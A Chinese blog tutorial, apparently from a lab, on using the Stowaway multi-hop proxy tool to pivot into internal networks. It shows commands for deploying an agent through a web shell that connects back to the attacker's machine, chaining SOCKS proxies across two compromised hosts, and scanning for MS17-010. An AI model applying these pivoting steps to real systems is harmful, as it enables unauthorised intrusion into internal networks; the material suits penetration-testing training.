Stowaway内网代理

已于 2023-07-24 21:23:32 修改
阅读量596 收藏 2
点赞数
文章标签: 代理模式
于 2023-07-24 21:00:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51151498/article/details/131888324
版权

Stowaway

       Stowaway是一个利用go语言编写、专为渗透测试工作者制作的多级代理工具,用户可使用此程序将外部流量通过多个节点代理至内网,突破内网访问限制,构造树状节点网络,并轻松实现管理功能。

特性

管理端更加友好的交互,支持命令补全/历史
一目了然的节点树管理
丰富的节点信息展示
节点间正向/反向连接
节点间支持重连
节点间可通过socks5/http代理进行连接
节点间可通过ssh隧道连接
节点间流量可选择TCP/HTTP
多级socks5流量代理转发,支持UDP/TCP,IPV4/IPV6
节点支持ssh访问远程主机
远程shell
上传及下载文件
端口本地/远程映射
节点可端口复用
自由开关各类服务
节点间相互认证
节点间流量以AES-256-GCM进行加密
相较于v1.0,文件体积减小25%
支持各类平台(Linux/Mac/Windows/MIPS/ARM)

名词解释:

节点: 指 admin || agent
主动模式: 指当前操作的节点主动连接另一个节点
被动模式: 指当前操作的节点监听某个端口,等待另一个节点连接
上游: 指当前操作的节点与其父节点之间的流量
下游:指当前操作的节点与其所有子节点之间的流量

Stowaway使用说明

Stowaway分为两个角色,分别是:
admin   渗透测试者使用的主控端
agent    渗透测试者部署的被控端

具体请参考:
https://github.com/ph4ntonn/Stowaway


建立一层Socks代理

获取靶机一的shell请参考:Socks代理_- Time的博客-CSDN博客

获得靶机一的shell

信息收集

 发现22网段主机,开启代理继续渗透

1. kali 上启动监听

./linux_admin -l 6666 -s qqww

2.靶机一启动agent

蚁剑连接并上传文件

/linux_agent -c 192.168.1.134:6666 -s qqww

kali收到会话

3.开启socks代理

进入靶机一的node节点,使用socks命令开启socks代理

detali  #查看节点

use 0
socks 1080

shell  #可以进入靶机一的命令行

4.打开proxychains4.conf文件

修改代理为以下:

 

5.测试代理

6.获取靶机二的shell,请参考:Socks代理_- Time的博客-CSDN博客

建立二层Socks代理

蚁剑连接靶机二的shell

信息收集

 发现33网段主机,开启二层代理继续渗透

1. 在node中开启监听

listen   #设置监听

1         #选择模式:被动

6000   #输入监听端口

 可以看到靶机一监听了6000端口

 2.靶机二连接监听端口

蚁剑上传agent文件,授予可执行权限:chmod +x linux-agent

./linux-agent -c 192.168.22.150:6000 -s qqww

Kali收到新节点:

 detail  #查看节点

 use 1 #选择节点1

 3.node 1 开启socks代理

 socks 1081      #node 1 就是靶机二

4.Kali打开proxychains4.conf文件

修改代理为以下:

5.测试代理

6.分析利用

 fscan探测存活主机:./fscan -h 192.168.33.0/24 > ping.txt

cat ping.txt

192.168.33.33主机存在ms17-010漏洞

 发现3389端口,但是拒绝连接

ms17-010漏洞的具体攻击过程,请参考:Socks代理_- Time的博客-CSDN博客

...

- Time
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
多级代理工具Stowaway
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
03-22 4888
节点: 指admin || agent主动模式: 指当前操作的节点主动连接另一个节点被动模式: 指当前操作的节点监听某个端口,等待另一个节点连接上游: 指当前操作的节点与其父节点之间的流量下游:指当前操作的节点与其所有子节点之间的流量。
利用Proxifier配置多级代理
谢公子的博客
09-20 5757
利用Proxifier配置多级代理
Stowaway搭建多级网络代理
good good study
03-21 3190
Stowaway是一个利用go语言编写、专为渗透测试工作者制作的多级代理工具,用户可使用此程序将外部流量通过多个节点代理内网,突破内网访问限制,构造树状节点网络,并轻松实现管理功能。在win2012-1上执行,使用秘钥123连接控制端8000端口,并设置重连间隔时间,当控制端掉线时客户端每隔8s重连控制端。当客户端连接控制端后,使用detail就可以查看到目前有哪些客户端已经连接,使用use 节点,然后会进入这个节点的控制面板。被动模式: 指当前操作的节点监听某个端口,等待另一个节点连接。
Stowaway::ghost:Stowaway-用于渗透测试者的多跳代理工具
02-06
偷渡者 Stowaway是一个利用go语言编写,专为渗透测试工作者制作的多级代理工具 用户可使用此程序将外部流量通过多个代理内网,突破内网访问限制,构造树状节点网络,并轻松实现管理功能 PS:谢谢大家的star,同时欢迎大家使用后提出问题 :face_blowing_a_kiss: 。 PPS:请在使用前详细阅读使用方法及文末的注意事项! 此工具仅限于安全研究和教学,用户承担因使用此工具而导致所有法律和相关责任!作者不承担任何法律和相关责任! 特性 一目了然的议员树管理 丰富的摘要信息展示及长久保存 官员间正向/反向连接 官员间可通过socks5代理进行反向连接 ssh隧道连接 多平台适应 多级袜子5流量代理转发(支持UDP /
组件分享之后端组件——一个利用go语言编写、专为渗透测试工作者制作的多级代理工具Stowaway...
CN華少的博客
04-19 342
组件分享之后端组件——一个利用go语言编写、专为渗透测试工作者制作的多级代理工具Stowaway 背景 近期正在探索前端、后端、系统端各类常用组件与工具,对其一些常见的组件进行再次整理一下,形成标准化组件专题,后续该专题将包含各类语言中的一些常用组件。欢迎大家进行持续关注。 组件基本信息 组件:Stowaway 开源协议:MIT License 内容 本节我们分享一个利用go语言编写、专为...
Stowaway搭建多级代理隧道
sirius的博客
08-21 672
正向代理是一个位于客户端和原始服务器之间的服务器,为了从原始服务器取得内容,客户端向代理发送一个请求并指定目标(原始服务器),然后代理向原始服务器转交请求并将获得的内容返回给客户端。客户端是无感知代理的存在,以代理服务器来接受internet上的连接请求,然后将请求转发给内部网络上的服务器,并将从服务器上得到的结果返回给internet上请求连接的客户端。从目标机器能够反弹shell到攻击者的外网VPS,攻击者通过反弹回来的shell能够很方便的对目标内网进行扫描,这就是反向代理的一种表现形式。
内网穿透工具--Stowaway流量特征检测分析
qq_36259703的博客
01-24 1480
Stowaway是一个利用go语言编写、专为渗透测试工作者制作的多级代理工具用户可使用此程序将外部流量通过多个节点代理内网,突破内网访问限制,构造树状节点网络,并轻松实现管理功能感觉类似termite。
内网入口——代理搭建&端口转发
Captain_RB的博客
12-19 1万+
内网渗透过程中经常会遇到搭建代理和端口转发的情况,本文记录一些常用工具的使用方法和典型应用场景,便于查阅。
常见安全易用的代理方法
tempulcc的博客
11-08 1803
常见安全易用的代理方法一、SSH隧道代理1、本地转发(正向代理)(1)基本设置(2)建立代理(3)验证2、远程转发(反向代理)(1)基本设置(2)建立代理(3)验证二、frp三、proxychains 一、SSH隧道代理 SSH隧道 创建ssh隧道常用参数 -C 压缩传输 -f 将ssh传输转入后台执行 不占用当前shell -N 建立静默连接(建立了连接,但看不到具体会话) -g 允许远程主机连接本地端口用于端口转发 -L 本地端口转发 1、本地转发(正向代理) 简单理解:主机A无法直接访问主机C,但是
MSF内网穿透之端口转发
weixin_46686336的博客
11-09 252
内网穿透之端口映射
红队常用命令速查
热门推荐
Hardworking666的博客
10-23 2万+
红队常用命令
CFS三层内网靶场渗透
Cfoxer的博客
10-25 2522
使用搭载了VMnet1网卡的kali模拟攻击者从外网信息收集,得到网站信息,利用网站漏洞夺取外网服务器权限,又将失陷的外网服务器作为跳板机,通过代理的方式访问到了内网服务器,然后通过内网服务器网站的漏洞,再一次夺取权限并建立二次代理以后,到达内网办公环境,最后利用主机所存在的漏洞,获得内网主机权限的渗透流程。发现22网段存在设备2,ip地址为192.168.22.129,并且设备2,开启80端口,配置浏览器代理插件,使用浏览器访问查看。访问成功,设置socks5代理,然后使用蚁剑连接。
设计模式-代理模式Proxy(结构型)
qq_43676797的博客
06-11 436
可以发现代理类只能代理实现Pay接口的类,不够灵活。开发过程中,经常会有日志、事务等的操作是不区分业务逻辑的,可以使用动态代理代理模式和装饰模式非常相似,只是在语义上不一样。
享元和代理模式
最新发布
Sun的个人博客
06-15 420
*** Description: 抽象的网站*//*** Description: 接口*//*** Description: 被代理的接口*//*** Description: 被代理的类*/System.out.println(name + "老师授课中,使用的是cglib代理,不需要实现接口");
C++设计模式---代理模式
专注
06-15 194
(1)远程代理(Remote Proxy):为一个位于不同地址空间的对象提供一个本地的代理对象,这个对象作为该远程对象的代表,以隐藏一个对象存在于不同地址空间的事实。代理对象在客户端和目标对象之间起到中介的作用,可以隐藏目标对象的实现细节,增加额外的功能(如访问控制、日志记录、性能监控等),或者对目标对象的访问进行优化。(2)代理对象(Proxy):持有目标对象的引用,控制对目标对象的访问,并可能提供额外的功能。(1)目标对象(Real Subject):代理对象所代表的真实对象,是最终要引用的对象。
代理模式(设计模式)
刘皇叔说Java的博客
06-14 624
代理模式可以在不改变目标对象的情况下,提供额外的功能或控制。代理对象是目标对象的代表,其他需要与这个目标对象打交道的操作都是和这个代理对象在交涉。代理对象可以在客户端和目标对象之间起到中介的作用,这样起到了的作用和保护了目标对象的,同时也在一定程度上面减少了系统的耦合度。代理模式是一种非常实用的设计模式,适用于多种场景,通过代理对象来封装和控制对目标对象的访问,使得系统具备更好的扩展性和维护性。性能开销:由于代理模式需要额外的代理对象,因此会有一定的性能开销,特别是在频繁访问的情况下性能影响更加明显。
279. 完全平方数
m0_63653444的博客
06-09 415
动态规划的转移方程就对应递归的过程,动态规划的初始条件就对应递归的出口。递归相当于先压栈压栈然后出栈出栈,动态规划可以省去压栈的过程。解法一超时,解法二优化通过使用 HashMap 保存。
代理模式与静态代理、动态代理的实现(Proxy.newProxyInstance、InvocationHandler)
李斯维的博客空间
06-12 1065
代理模式是23种设计模式中比较常用的一种,属于结构型设计模式。在 Android 领域中,有大量的库都使用了代理模式,例如 Retrofit 使用动态代理来实现 API 接口的调用,Dagger 使用代码生成和反射机制来创建依赖注入的代理对象等等。本文将带你了解代理模式,并且介绍静态代理和动态代理的实现方式。
DP动态规划(下)
qianzhima2012的博客
06-11 935
确定状态变量及其含义,然后根据问题逻辑构建状态转移方程。边界条件通常用于直接给出或推导出最基本状态的值。明确表示问题状态的方式,这通常通过变量或数据结构来实现。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值